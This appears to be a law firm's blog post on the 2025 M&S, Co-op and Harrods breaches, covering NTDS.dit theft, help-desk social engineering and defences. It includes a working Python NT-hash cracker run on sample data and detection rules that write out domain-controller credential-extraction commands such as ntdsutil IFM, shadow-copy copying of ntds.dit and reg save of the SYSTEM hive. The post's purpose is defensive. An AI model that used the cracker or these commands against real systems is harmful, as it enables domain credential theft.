M&S, Co-op and Harrods cyberattacks: What went wrong?

Each has fallen victim to highly coordinated cyberattacks that have disrupted operations, compromised data and raised serious questions about the resilience of enterprise cybersecurity strategies.  

So what exactly went wrong, and – more importantly – what can your organisation do to avoid a similar fate? 

What Happened?

Marks & Spencer (M&S): Threat actors linked to the Scattered Spider group are reported to have had a foothold in M&S’s systems as early as February 2025. They reportedly exfiltrated the NTDS.dit file from the company’s Active Directory: the domain controller database that holds every account in the Windows domain together with its password hash, group memberships and the rest of the directory structure. (The hashes inside NTDS.dit are encrypted with a key derived from the domain controller’s SYSTEM registry hive, so an attacker who takes the file normally takes that hive with it.) With the file in hand, the threat actors could crack the weaker password hashes offline and, because NT hashes can be replayed without being cracked, use others directly in pass-the-hash attacks, allowing them to escalate privileges and move laterally across internal systems. Once elevated access was obtained, DragonForce ransomware was deployed across critical VMware ESXi infrastructure, disrupting online orders, payments and logistics. Estimated losses have already run into the millions. 

Co-op: In what appears to be a related campaign, threat actors targeted the Co-op through social engineering: by impersonating employees and persuading IT help desk staff to reset passwords, they gained unauthorised access across multiple systems. The Co-op shut down several internal systems to contain the breach, and the personal data of approximately 20 million Co-op members may have been compromised. 

Harrods: Shortly after these attacks, Harrods was reportedly struck by threat actors claiming to be part of the same co-ordinated campaign. At the time of writing, details are still emerging, but the tactics reported so far resemble those of the Co-op breach: identity fraud, phishing and help desk impersonation. Investigations into the impact on operations and customer data are ongoing. 

What Went Wrong?

These incidents expose several recurring vulnerabilities: 

  1. Weak Help Desk Protocols – In both the Co-op and Harrods cases, threat actors reportedly gained entry by manipulating IT support staff. Weak identity verification for password resets let the threat actors pose as legitimate employees locked out of their accounts, and a reset granted on the caller’s say-so hands over the account regardless of how strong the original password was. 
  2. Poor Network Segmentation – Once inside, the threat actors were able to move laterally within the internal networks, suggesting insufficient segmentation and monitoring between user endpoints, servers and the virtualisation layer that ultimately carried the ransomware. 
  3. Credential Theft – The M&S attack put a spotlight on the risk of an inadequately protected Active Directory. NTDS.dit contains the password hash of every domain account, privileged ones included, so whoever holds a copy does not need to wait for a lucky guess: NT hashes can be replayed directly in pass-the-hash attacks, and because they are unsalted MD4 values with no iteration count, weak or reused passwords fall to offline cracking in minutes. 
  4. Delayed Detection – In each case, threat actors were reportedly inside the environment for extended periods before being discovered, giving them ample opportunity to exfiltrate sensitive data and prepare further damage. 
  5. Limited Multi-Factor Authentication (MFA) – MFA that is not enforced at every access point, or that can be reset or re-enrolled through the same help desk process an attacker has already subverted, offers little protection: a password reset that also clears the user’s registered MFA device effectively bypasses it. 
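Why a stolen NTDS.dit is so damaging is easiest to see in code. The following is an added example written for this page, not code from M&S, the attackers or any tool named above. It reimplements the NT hash (MD4 over the UTF-16LE password, with no salt and no stretching) and runs a dictionary attack over a constructed pwdump-style extract, then flags accounts that share a hash, which unsalted storage makes visible without cracking anything. The account names, passwords and wordlist are made up; the only real constants are the MD4 initialisation values and the well-known empty LM hash.

```python
import struct
from collections import defaultdict


def _md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320). Included because hashlib builds on
    OpenSSL 3 often no longer expose MD4 without the legacy provider."""
    mask = 0xFFFFFFFF

    def rotl(x, n):
        return ((x << n) | (x >> (32 - n))) & mask

    def F(x, y, z):
        return (x & y) | (~x & z)

    def G(x, y, z):
        return (x & y) | (x & z) | (y & z)

    def H(x, y, z):
        return x ^ y ^ z

    # (round function, additive constant, message-word order, shift schedule)
    rounds = (
        (F, 0x00000000, list(range(16)), (3, 7, 11, 19)),
        (G, 0x5A827999, [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13)),
        (H, 0x6ED9EBA1, [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15)),
    )
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)          # bit length, little-endian
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for fn, k_add, order, shifts in rounds:
            for i, k in enumerate(order):
                a = rotl((a + fn(b, c, d) + X[k] + k_add) & mask, shifts[i % 4])
                a, b, c, d = d, a, b, c              # rotate registers for the next step
        a, b, c, d = (a + aa) & mask, (b + bb) & mask, (c + cc) & mask, (d + dd) & mask
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> str:
    """NT hash as stored in NTDS.dit: MD4(UTF-16LE(password)), hex encoded.
    No salt and no iteration count, so one hash computation per candidate
    word is compared against every account at once."""
    return _md4(password.encode("utf-16-le")).hex()


def crack_dump(dump_lines, wordlist):
    """Offline dictionary attack over secretsdump-style lines of the form
    'DOMAIN\\user:RID:LMHASH:NTHASH:::'. Returns (cracked, reuse): cracked maps
    account -> recovered password; reuse maps NT hash -> accounts sharing it."""
    lookup = {nt_hash(word): word for word in wordlist}   # hash each candidate once
    cracked, by_hash = {}, defaultdict(list)
    for line in dump_lines:
        account, _rid, _lm, nthash = line.split(":")[:4]
        nthash = nthash.lower()
        by_hash[nthash].append(account)                  # identical passwords => identical hashes
        if nthash in lookup:
            cracked[account] = lookup[nthash]
    reuse = {h: accounts for h, accounts in by_hash.items() if len(accounts) > 1}
    return cracked, reuse


# Constructed sample extract (made-up accounts and passwords, not real data).
# The LM field is the well-known "empty LM hash"; NT hashes are generated here.
_EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
SAMPLE_DUMP = [
    f"CORP\\alice:1105:{_EMPTY_LM}:{nt_hash('Summer2025!')}:::",
    f"CORP\\bob:1106:{_EMPTY_LM}:{nt_hash('Summer2025!')}:::",
    f"CORP\\svc_backup:1120:{_EMPTY_LM}:{nt_hash('Password1')}:::",
    f"CORP\\da_jsmith:1001:{_EMPTY_LM}:{nt_hash('c0rrect-h0rse-battery-stapler-9!')}:::",
]
SAMPLE_WORDLIST = ["password", "Password1", "Summer2025!", "Welcome1", "Winter2024"]

if __name__ == "__main__":
    cracked, reuse = crack_dump(SAMPLE_DUMP, SAMPLE_WORDLIST)
    for account, password in cracked.items():
        print(f"cracked  {account}: {password}")
    for h, accounts in reuse.items():
        print(f"shared   {h}: {', '.join(accounts)}")
    # da_jsmith survives the wordlist, but its hash is still usable as-is
    # in a pass-the-hash attack; only the cleartext stays unknown.
```

A real wordlist runs to hundreds of millions of entries and a GPU cracker evaluates billions of unsalted MD4 hashes per second, so the minutes-to-hours figure in the list above is conservative for anything that is not long and random.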

How Can You Protect Your Organisation?

  1. Strengthen Verification Protocols: Implement robust verification for IT help desk interactions: call the user back on a number already held in the HR or directory record (never one the caller supplies), confirm through a second channel such as the line manager, or use token- or biometric-based verification. Treat MFA re-enrolment and resets of privileged accounts as high-risk requests that need stronger checks than a routine reset. 
  2. Segment Your Network: Implement internal segmentation so that a compromised endpoint cannot freely reach critical infrastructure such as domain controllers, backup servers and hypervisor management interfaces. Use role-based access controls and restrict lateral movement paths where appropriate. 
  3. Monitor Critical Infrastructure: Actively monitor access to sensitive assets like Active Directory, including shadow-copy creation or ntdsutil use on domain controllers and directory replication requests from accounts that are not domain controllers. Deploy Endpoint Detection and Response (EDR) and regularly audit privileged access activity. 
  4. Enforce Robust MFA Policies: Ensure multi-factor authentication is enabled across all access points, especially for administrative functions and remote access. Prefer phishing-resistant methods such as FIDO2 security keys. Any MFA is better than none, but SMS codes and simple push approvals can be phished or worn down by repeated prompts, so not all types offer the same level of protection. 
  5. Regular Staff Training: Continuously educate staff, particularly help desk employees, with realistic simulations and social engineering awareness programs. 
  6. Develop and Practice Incident Response Plans: Ensure your organisation has clearly defined and up-to-date incident response strategies. These should be regularly rehearsed, so response teams can act swiftly to contain and mitigate cyber incidents. 
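Item 3 is the point at which an NTDS.dit theft can be caught before the ransomware stage. The following is an added example, not code from the page or from any vendor product: it runs a small set of detection rules over constructed Windows Security events, namely 4688 process-creation records for ntdsutil, shadow-copy, NTDS.dit copy and SYSTEM hive save commands, and 4662 records whose Properties field carries the directory replication control-access rights a DCSync attack needs. The event records, host and account names and the replication allow-list are assumptions; the two GUIDs are the real Active Directory values.

```python
import re

# Control-access right GUIDs written into the Properties field of Event ID
# 4662 when an account requests directory replication. Holding both is what
# a DCSync attack needs to pull every hash without touching NTDS.dit itself.
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
}

# Process-creation (Event ID 4688 / Sysmon 1) command lines seen when
# NTDS.dit is extracted from a domain controller. The SYSTEM hive is needed
# to decrypt the hashes, so saving it belongs to the same pattern.
CMDLINE_RULES = [
    ("ntdsutil_ifm", re.compile(r"ntdsutil.*\b(ifm|ac\s+i\s+ntds|create\s+full)\b", re.I)),
    ("vss_shadow_copy", re.compile(r"(vssadmin.*create\s+shadow|diskshadow|shadowcopy\s+call\s+create)", re.I)),
    ("ntds_dit_copy", re.compile(r"ntds\.dit", re.I)),
    ("system_hive_save", re.compile(r"reg(\.exe)?\s+save\s+hklm\\system", re.I)),
]


def detect(events, replication_allowlist):
    """Return (rule, account, detail) tuples for events that match a rule.

    events: dicts holding the fields of a parsed Windows Security event.
    replication_allowlist: lower-cased accounts that legitimately replicate
    (domain controller computer accounts, the directory sync account).
    """
    alerts = []
    for ev in events:
        account = ev.get("SubjectUserName", "?")
        if ev.get("EventID") == 4688:
            cmd = ev.get("CommandLine", "")
            for rule, pattern in CMDLINE_RULES:
                if pattern.search(cmd):
                    alerts.append((rule, account, cmd))
                    break   # one alert per process; rules are ordered by specificity
        elif ev.get("EventID") == 4662:
            props = ev.get("Properties", "").lower()
            rights = [name for guid, name in REPLICATION_GUIDS.items() if guid in props]
            if rights and account.lower() not in replication_allowlist:
                alerts.append(("dcsync_replication", account, ", ".join(rights)))
    return alerts


# Constructed sample: events as a SIEM would present them, trimmed to the
# fields the rules use. Hosts, accounts and paths are made up.
SAMPLE_EVENTS = [
    {"EventID": 4688, "Computer": "DC01", "SubjectUserName": "svc_backup",
     "CommandLine": r'ntdsutil.exe "ac i ntds" "ifm" "create full C:\Windows\Temp\x" q q'},
    {"EventID": 4688, "Computer": "WS042", "SubjectUserName": "alice",
     "CommandLine": r'"C:\Windows\system32\notepad.exe" C:\Users\alice\notes.txt'},
    {"EventID": 4662, "Computer": "DC01", "SubjectUserName": "DC02$",
     "Properties": "Control Access {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "Computer": "DC01", "SubjectUserName": "jdoe",
     "Properties": "Control Access {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4688, "Computer": "DC01", "SubjectUserName": "svc_backup",
     "CommandLine": r"cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit C:\Windows\Temp"},
    {"EventID": 4688, "Computer": "DC01", "SubjectUserName": "svc_backup",
     "CommandLine": r"vssadmin.exe create shadow /for=C:"},
    {"EventID": 4688, "Computer": "DC01", "SubjectUserName": "svc_backup",
     "CommandLine": r"reg.exe save hklm\system C:\Windows\Temp\sys.hiv"},
]

# Assumed allow-list: the two domain controllers and the directory sync account.
SAMPLE_ALLOWLIST = {"dc01$", "dc02$", "msol_sync"}

if __name__ == "__main__":
    for rule, account, detail in detect(SAMPLE_EVENTS, SAMPLE_ALLOWLIST):
        print(f"{rule:20} {account:12} {detail}")
```

The 4662 rule only fires if "Audit Directory Service Access" is enabled on the domain controllers and the events are shipped off-host; the command-line rules need process-creation auditing with command-line logging turned on. A legitimate backup job on a domain controller will trip the shadow-copy rule, so the practical step is to baseline which accounts and hosts are expected to produce these events and alert on everything else, as the allow-list does for replication.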

The attacks on M&S, Co-op and Harrods serve as a reminder that even the most well-resourced and recognisable organisations remain vulnerable to social engineering and credential-based attacks. By learning from these high-profile breaches, your organisation can take proactive steps to harden defences, reduce exposure and respond effectively when, not if, a cyber-attack occurs.   

How can we help?

If you’re concerned about the issues raised or unsure how they apply to your organisation, we’re here to help. We can work with you to turn these insights into clear, actionable steps, helping you better understand your exposure, prioritise key risks, and strengthen your overall readiness. Get in touch with the Cyber, Data and Information Law team today to start the conversation. 

Whether you’re looking to strengthen your processes, navigate risk roadblocks or protect your business from harm, our team is armed with the guidance and tools you need to be by your side and make your business unstoppable.